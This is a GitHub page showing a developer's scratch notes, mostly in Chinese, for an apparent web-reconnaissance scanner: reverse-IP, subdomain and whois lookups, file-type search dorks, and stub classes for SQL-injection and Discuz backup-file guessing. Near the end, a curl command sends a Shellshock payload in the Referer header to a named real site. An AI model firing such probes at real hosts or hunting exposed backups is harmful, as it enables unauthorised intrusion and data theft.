-
Notifications
You must be signed in to change notification settings - Fork 5
/
note.txt
93 lines (67 loc) · 3.45 KB
/
note.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
1 加入多进程扫描
2 优化扫描过程
3 加入 robot.txt, sitemap.xml 扫描
3 googleSearch page not implementation
dns 反射查询
curl 'http://dns.aizhan.com/index.php?r=index/domains&ip=183.60.196.169&page=2
返回json
>>>import json
>>>j = json.loads(response)
>>>print j['domains']
[u'www.chinanews.com.cn', u'www.cea.gov.cn', u'www.gwytb.gov.cn', u'www.catti.net.cn', u'i5.chinanews.com', u'mfm.moliyo.com', u'kazak.chinabroadcast.cn', u'arabic.cri.cn', u'english.cri.cn', u'indonesian.cri.cn', u'newsradio.cri.cn', u'sports.cri.cn', u'bengali.cri.cn', u'hindi.cri.cn', u'persian.cri.cn', u'home.china.com.cn', u'local.china.com.cn', u'attach.bbs.china.com.cn', u'app.chinadaily.com.cn', u'focus.china.com.cn']
子域名查询
curl -s --data 'domain=xiuren.com&b2=1&b3=1&b4=1' http://i.links.cn/subdomain/|grep nofollow
xpath: '//a[@rel='nofollow']/@href'
1.查询DNS
import sys,socket
result=socket.getaddrinfo(sys,argv[1],None)
print result[0][4]
>>> r = socket.gethostbyname_ex('www.baidu.com') #r = (hostname, aliaslist, ipaddrlist)
>>> print r
('www.a.shifen.com', ['www.baidu.com'], ['115.239.210.27', '115.239.211.110'])
>>> socket.gethostbyname_ex('www.newsmth.net')
('ks12.newsmth.net', ['www.newsmth.net', 'www.k.newsmth.net'], ['42.62.43.22'])
2 反向查询:
import sys,socket
try:
result=socket.gethostbyaddr(sys.argv[1])
print "hostname is "+result[0]
except socket.herror,e:
print "can't look up"
whois
# firebug 可以生成xpath表达式
curl 'http://whois.aizhan.com/index.php?r=site/searchDomain&s=www.cankaoxiaoxi.com&ajax=yes&update=false&field=base' # //xpath: //*[@id="whoisContentHead"]
curl 'http://whois.aizhan.com/index.php?r=site/searchDomain&s=www.cankaoxiaoxi.com&ajax=yes&update=false&field=details' # //xpath: //*[@id="whoisContentDetails"]
http://whois.www.net.cn/whois/domain/cankaoxiaoxi.com # 先在这页取cookie
http://whois.www.net.cn/whois/api_whois?host=cankaoxiaoxi.com&_=1416719143236 # 返回json
http://whois.www.net.cn/whois/api_whois_full?host=cankaoxiaoxi.com&web_server=whois.paycenter.com.cn&_=1416719145225
# 取title
$curl -s --data "domain=cankaoxiaoxi.com&b2=1&b3=1&b4=1" "http://i.links.cn/subdomain/"|xpath.py "/html/head/title"
cankaoxiaoxi.com下所有子域名列表-站长帮手网
字符集检查xpath
/html/head/meta[1]/@content
/html/head/meta[1]/@charset
# 解决 ghack 输出乱码
# aol search it's base on google
http://search.aol.com/aol/search?enabled_terms=&s_it=comsearch&q=site%3Aletv.com+ext%3Axls&s_chn=prt_aol20
#ck = cookielib.Cookie(version=0, name='Name', value='1', port=None,
# port_specified=False, domain='www.example.com', domain_specified=False,
# domain_initial_dot=False, path='/', path_specified=True, secure=False,
# expires=None, discard=True, comment=None, comment_url=None,
# rest={'HttpOnly': None}, rfc2109=False)
#cj.set_cookie(ck)
"""
class SqlInjectionTester(Tester):
def scan(self, url, scaner):
pass
# /DZ/Data/BACKUP~1/141010~1.SQL OR /DZ/DATA/BACKUP/???.SQL
# guess by date ~~~~~~~~
# it's effective in winnt
class DZBackupTester(Tester): # FIXME: change to Scanner, not Tester
def scan(self, url, scanner):
pass # TODO:
"""
# -I fetch headers only
time curl -I -v -H 'Referer: () { :;};/bin/sleep 7' 'http://www.whitewaterwest.cn/cgi/page.cgi?aid=338&_id=1448&zine=show'
# http://mytool.chinaz.com/baidusort.aspx?host=cankaoxiaoxi.com&sortType=0
#<div class="siteinfo">百度权重:<font color="blue">6</font> 关键词数:<font color="blue">